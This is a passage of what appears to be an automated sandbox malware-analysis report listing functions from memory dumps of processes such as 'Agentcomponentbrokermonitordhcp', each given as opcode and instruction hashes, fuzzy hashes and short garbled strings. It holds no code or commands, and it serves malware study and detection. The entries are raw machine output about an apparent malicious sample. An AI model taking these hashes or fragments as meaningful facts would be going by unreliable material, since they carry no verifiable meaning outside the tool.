                                                                                                                    • Opcode ID: 199617df46d6ee89399db1058b01bf60fbd14e03bb1f6667b10a238919d08ae1
                                                                                                                    • Instruction ID: 7f38cf5823b038f8d74fdaa7c435fc53ade4a68c2c57af214ddcd3e797bdaac4
                                                                                                                    • Opcode Fuzzy Hash: 199617df46d6ee89399db1058b01bf60fbd14e03bb1f6667b10a238919d08ae1
                                                                                                                    • Instruction Fuzzy Hash: 7BC08C00F0CD1B02F759A204243067D08029F80608F8507B0E41E877DECD0C1E0222CB

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B7E06FA Relevance: 9.0, Strings: 7, Instructions: 222COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =N_^$N_^%$N_^($N_^*$N_^+$N_^2$N_^4
                                                                                                                    • API String ID: 0-1975945381
                                                                                                                    • Opcode ID: ead795f3082a5b0d8de7ed053cbd4e31487b3479410fb032dc5d0ac12dcca313
                                                                                                                    • Instruction ID: 12fb3e0747269d8c57731d47c99d247bc52a000c5d81f98526bea7302f477ab5
                                                                                                                    • Opcode Fuzzy Hash: ead795f3082a5b0d8de7ed053cbd4e31487b3479410fb032dc5d0ac12dcca313
                                                                                                                    • Instruction Fuzzy Hash: 3F51855BF0C56609E319B7A8396A9FD3724DF8133EB26C6B3E12E890D78C1C658241D9
                                                                                                                    Function 00007FFD9B7E063D Relevance: 7.8, Strings: 6, Instructions: 297COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =N_^$N_^($N_^*$N_^+$N_^2$N_^4
                                                                                                                    • API String ID: 0-837699881
                                                                                                                    • Opcode ID: b3dd306a25b4eb25e4fd16bdd6510cdd599aa49d87ec3214658853a33fbc0ca3
                                                                                                                    • Instruction ID: 894b414ecc398bf6d8e61e1a0b293f38030d7e851c5f5c77e219116f1ee95af7
                                                                                                                    • Opcode Fuzzy Hash: b3dd306a25b4eb25e4fd16bdd6510cdd599aa49d87ec3214658853a33fbc0ca3
                                                                                                                    • Instruction Fuzzy Hash: CF81061BF0C5A609D319B7ED796A9FD7720DFC037EB2686B3D26E890D78C18608242D5
                                                                                                                    Function 00007FFD9B7E06D3 Relevance: 5.2, Strings: 4, Instructions: 226COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: N_^*$N_^+$N_^2$N_^4
                                                                                                                    • API String ID: 0-2488992247
                                                                                                                    • Opcode ID: 31ad36dbd34d14c8f9b1075315c9ff444c6a23da3e1dd33c2b854abe93a877ad
                                                                                                                    • Instruction ID: a62255f11a0233fea9bca9a5306f955965a107f2f578efac510cb03b54c05d4d
                                                                                                                    • Opcode Fuzzy Hash: 31ad36dbd34d14c8f9b1075315c9ff444c6a23da3e1dd33c2b854abe93a877ad
                                                                                                                    • Instruction Fuzzy Hash: B651851BF0C5A605E719B7B8396A8FD7720DF8133EB26C6F7E16E890DB8C18658241C5

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B7C0D48 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5\_H
                                                                                                                    • API String ID: 0-3325266018
                                                                                                                    • Opcode ID: 2db8a51b1c9d50f43f069101daded99c4bbbee0297b790d2f9ebd8529b51ecd9
                                                                                                                    • Instruction ID: f028cef345db4126654a92473e2d531f276947760d0f9adc1a102cdf8d0d11d3
                                                                                                                    • Opcode Fuzzy Hash: 2db8a51b1c9d50f43f069101daded99c4bbbee0297b790d2f9ebd8529b51ecd9
                                                                                                                    • Instruction Fuzzy Hash: 08910175A09A8D5FE799EF688869BA97BE0FB95704F0001BED049C73E2CB782410C740
                                                                                                                    Function 00007FFD9B7C08D0 Relevance: .2, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 948800d593c87a16d451f9582324c9e7ad88bdc02ce63323ba382857a882ea37
                                                                                                                    • Instruction ID: 0b23f58c4501db2ea9a819a34f77f8f89d17e9a2a786156ec3b5bf20e285f802
                                                                                                                    • Opcode Fuzzy Hash: 948800d593c87a16d451f9582324c9e7ad88bdc02ce63323ba382857a882ea37
                                                                                                                    • Instruction Fuzzy Hash: 79413726F0C6590EE314F7B860A9AFD7791EF89329B1541FBD04DC72EBCD18A84182C1
                                                                                                                    Function 00007FFD9B7C0910 Relevance: .2, Instructions: 152COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d1fc204a0a5cbf2d65b3d2b887b89a934a728040c3aa722c498338c594f16746
                                                                                                                    • Instruction ID: b9c9cb416522cb629afafa3e564b81a54ab1637b8f08b0d3d1fc2238fef32e43
                                                                                                                    • Opcode Fuzzy Hash: d1fc204a0a5cbf2d65b3d2b887b89a934a728040c3aa722c498338c594f16746
                                                                                                                    • Instruction Fuzzy Hash: 58412826F0C6590EE314F77860A9AFC7791EF89329B1585FBD04DC72EBCD18A84182C5
                                                                                                                    Function 00007FFD9B7C0960 Relevance: .1, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5a1dc5bf9fcbe707315008ae000572c4f19dd5689cb0a67e04ac28f49a5618a5
                                                                                                                    • Instruction ID: b6e7ef216cf56280b893bc47151f2c6ce2dedd8d92134d1f464dfaea68c91eee
                                                                                                                    • Opcode Fuzzy Hash: 5a1dc5bf9fcbe707315008ae000572c4f19dd5689cb0a67e04ac28f49a5618a5
                                                                                                                    • Instruction Fuzzy Hash: 7831D726F1CA5D1FE358F768646AAF973D1DB88329B1141FEE40EC32EBDD18AC414285
                                                                                                                    Function 00007FFD9B7C0998 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c968a4df1d1d232117db49736caceadcc59a0bfe5e719c71516d431abc7a87c5
                                                                                                                    • Instruction ID: 25c44edd11c01d061e5474e2b5c8343003d115e5be8aebc2588ab53844054bea
                                                                                                                    • Opcode Fuzzy Hash: c968a4df1d1d232117db49736caceadcc59a0bfe5e719c71516d431abc7a87c5
                                                                                                                    • Instruction Fuzzy Hash: 5221C820B19A1D1FE798F76C9469A7973C2EB98315B5101BDE80DC33FBDD28EC418281
                                                                                                                    Function 00007FFD9B7C0C25 Relevance: .1, Instructions: 80COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a1bda7a0783d90b4d1711479b6756be6928a9ea02e375703d4856adedf2c6c1c
                                                                                                                    • Instruction ID: 602480df81df5eed0aa5dbc7b6e8438c6d89473bea095e77da256c0f85abf3a5
                                                                                                                    • Opcode Fuzzy Hash: a1bda7a0783d90b4d1711479b6756be6928a9ea02e375703d4856adedf2c6c1c
                                                                                                                    • Instruction Fuzzy Hash: D3210736F0D34D9FE722F6A898550EC7B70EF41324F1582B7D0488A1E3D93826468795
                                                                                                                    Function 00007FFD9B7C6872 Relevance: .1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1daf68b7c61757d4b8d83812ebec9af404e90fc19a47d21ad49c9de39bf35872
                                                                                                                    • Instruction ID: 0d391515fc07ef03a31cf2dc1c8315fc911efdd541fd14fd3b9c2be4f1328173
                                                                                                                    • Opcode Fuzzy Hash: 1daf68b7c61757d4b8d83812ebec9af404e90fc19a47d21ad49c9de39bf35872
                                                                                                                    • Instruction Fuzzy Hash: CC11A720E0DA1D5FE7B4F65494A46B872D0FF14700F5102BDD44EE33B2EE28AE404744
                                                                                                                    Function 00007FFD9B7C0C38 Relevance: .1, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 60959e3fa99561a3c17493bd02af8b62a82457fa20571028c8dfab3489e22b49
                                                                                                                    • Instruction ID: c458a676dde66a53cebb3ce0ea3d5b4d769a7e12eebd8079ac22dfe41ac5d97a
                                                                                                                    • Opcode Fuzzy Hash: 60959e3fa99561a3c17493bd02af8b62a82457fa20571028c8dfab3489e22b49
                                                                                                                    • Instruction Fuzzy Hash: 9A11A335A0D34D9FE721EBA8C8641EC7BB0EF41714F1646BBC044DB2E2D53416058790
                                                                                                                    Function 00007FFD9B7C0C48 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 04d495dd8f53577a9b3b2684c9ea670c3204e299b2f4c71346d8ede69bf848c0
                                                                                                                    • Instruction ID: ff2e18d9f879a8769d3b710e4d5e603e0745faa1cf387ee92f2f8b3df862c45b
                                                                                                                    • Opcode Fuzzy Hash: 04d495dd8f53577a9b3b2684c9ea670c3204e299b2f4c71346d8ede69bf848c0
                                                                                                                    • Instruction Fuzzy Hash: E8018035A0E3899FD721EB64C8541ACBFB0EF42304F1542FBC4449B2A2DA3456448780
                                                                                                                    Function 00007FFD9B7C69C4 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                    • Instruction ID: 6e117fa735203e50fe7fc78efa1fd2cc2c3a585ce16cb8b95babeaa274b5e41c
                                                                                                                    • Opcode Fuzzy Hash: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                    • Instruction Fuzzy Hash: 0A016230A0951E5EEB74BA40D8647F872A0FB64310F1102BEC44EE32B2EE286E818A45
                                                                                                                    Function 00007FFD9B7C5E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff33ab786e1f44efe491ee6d576271f61ccbc4d77c7eee1e1753fad1f8dfc8c6
                                                                                                                    • Instruction ID: 4a0c6a9369a947ddeeec373df7eb990435c2297ff1e5eff29b4a9b1529d444c3
                                                                                                                    • Opcode Fuzzy Hash: ff33ab786e1f44efe491ee6d576271f61ccbc4d77c7eee1e1753fad1f8dfc8c6
                                                                                                                    • Instruction Fuzzy Hash: 9DF0C231648A09CFCB54EF04C495FA973F1FB98315F1586A9D00ED7260DA35AA85DF81
                                                                                                                    Function 00007FFD9B7C0C50 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dfdc7124db56dd2636347f1540b50d2bd757e5c53671a7bdcd6932ab7d506b43
                                                                                                                    • Instruction ID: e44a74d622a26814dc411c5fba3bdab8f58ad4cffd7a4f357428296646858541
                                                                                                                    • Opcode Fuzzy Hash: dfdc7124db56dd2636347f1540b50d2bd757e5c53671a7bdcd6932ab7d506b43
                                                                                                                    • Instruction Fuzzy Hash: 15012134E0E3899FD721EB6484945ADBFB0EF45304F1542EBC4449B2A6DA3456448781
                                                                                                                    Function 00007FFD9B7C68B1 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                    • Instruction ID: cfcbeed02ba4241a801e1ce93dccab27724e6c6dde89140e42c978bb66d692c5
                                                                                                                    • Opcode Fuzzy Hash: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                    • Instruction Fuzzy Hash: 55F09630A0D50E5BEA74F644D4A56F833D1EF14300F1102BDD84EE33B2DD28BE954685
                                                                                                                    Function 00007FFD9B7C1DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction ID: 3ba68f50efb7a8f958bc3679fac23d9f33a696edc02a5dbcee2413c6c7eede2f
                                                                                                                    • Opcode Fuzzy Hash: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction Fuzzy Hash: 0EE01A74F0D61E97F768B284C8617F97265EB88300F15027CDA1EE33E2CE28AE418655
                                                                                                                    Function 00007FFD9B7C0D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction ID: 448851d1f3fff70622fbbc0a2e6e0fd4297fba6e1b76768301220f664b380cb0
                                                                                                                    • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction Fuzzy Hash: 1DE01234B0930EDBE720EB94C4946FD7761EB51711F104369C401873E9DA786784C6C0
                                                                                                                    Function 00007FFD9B7C0B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                    • Instruction ID: 6a5bbd66388dcbb346a7edf00143806d18500b8f5c0d7b3e57539f481a5b8840
                                                                                                                    • Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                    • Instruction Fuzzy Hash: CEC0123062990E8FDA40BB28C888924BBA0FB0E301BDA14E4E00CCB2B1D619A9908701
                                                                                                                    Function 00007FFD9B7C06A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f559e3ab96dd04511a946f111799bfe91db07818a80fda0c37e2ec604e3807dc
                                                                                                                    • Instruction ID: 6b75da0f0c771bf25e784323fcff1a4968f91f6448a00db1fdbf0146c84cde6d
                                                                                                                    • Opcode Fuzzy Hash: f559e3ab96dd04511a946f111799bfe91db07818a80fda0c37e2ec604e3807dc
                                                                                                                    • Instruction Fuzzy Hash: E9C01200F0BA0E20E42035AA14260BCB1005BC4A10FE2033AD409602B1980E22C50286
                                                                                                                    Function 00007FFD9B7C12B0 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: 7b03c07cb681e1ed34b68708899fa0ac1acd08ca3d5447746d2b24dbe251c3a9
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: F9C08C3051180C8FC908FB28C88591433A0FB09201BC20090E008C7270D219DCC0C780
                                                                                                                    Function 00007FFD9B7C4960 Relevance: .0, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1b6f984bbd993182487708df60ed9237f9a31ac62a982a5688068a53c75b7392
                                                                                                                    • Instruction ID: ef703badc9d9613cfa302083ca9d6d161290d6587c400b5186174c449057974c
                                                                                                                    • Opcode Fuzzy Hash: 1b6f984bbd993182487708df60ed9237f9a31ac62a982a5688068a53c75b7392
                                                                                                                    • Instruction Fuzzy Hash: 6DC08C00F0CD5E12F755B204243067D00825F80608F8107B4E81E877DECE0C1D0222CB
                                                                                                                    Function 00007FFD9B7C06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                    • Instruction ID: 95164ec44f2f3968b30242e56545a29082851d927301a35899cbc3a06c3aa39c
                                                                                                                    • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                    • Instruction Fuzzy Hash: F7B01200D5790F10E42431FA085607570405B44100FD20374E80C503B1984E12D40382

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B7C09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: a10340489a84e1e9be57acb8bf0dccd57836bf031a54555a739f40fe8d517881
                                                                                                                    • Instruction ID: 26d1f90a285166616353ee05b3166d29ce52349e97b83285e9db69ffb439d86a
                                                                                                                    • Opcode Fuzzy Hash: a10340489a84e1e9be57acb8bf0dccd57836bf031a54555a739f40fe8d517881
                                                                                                                    • Instruction Fuzzy Hash: 7341E31BF0C1A619E319B2FD75698FD2B688FC133EB1AC7B7E05D890D78D08208582E5

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B7E0D48 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Z_H
                                                                                                                    • API String ID: 0-3267294416
                                                                                                                    • Opcode ID: 3309236c314a02d5e308a61f9e9fd605d957c481e0c59a9dfae18d67eefd8548
                                                                                                                    • Instruction ID: 1bb60110d76ad7fb3d49784bbb2f23464ee568e3f6498d5a58342183421663ba
                                                                                                                    • Opcode Fuzzy Hash: 3309236c314a02d5e308a61f9e9fd605d957c481e0c59a9dfae18d67eefd8548
                                                                                                                    • Instruction Fuzzy Hash: A4512A61B1DA8D4FE759DB688876BA9BFE1FF95340F4501BAD048C72F6DE7828018740
                                                                                                                    Function 00007FFD9B7E08D0 Relevance: .2, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fa693c5268d75263a33ba3f7e77b68fde0f2473751fd4d3e86d70f453ce828df
                                                                                                                    • Instruction ID: 0dd61a603c72497cd2307369ca258b95c7b6cc091e201ad7de129f59b2556e2a
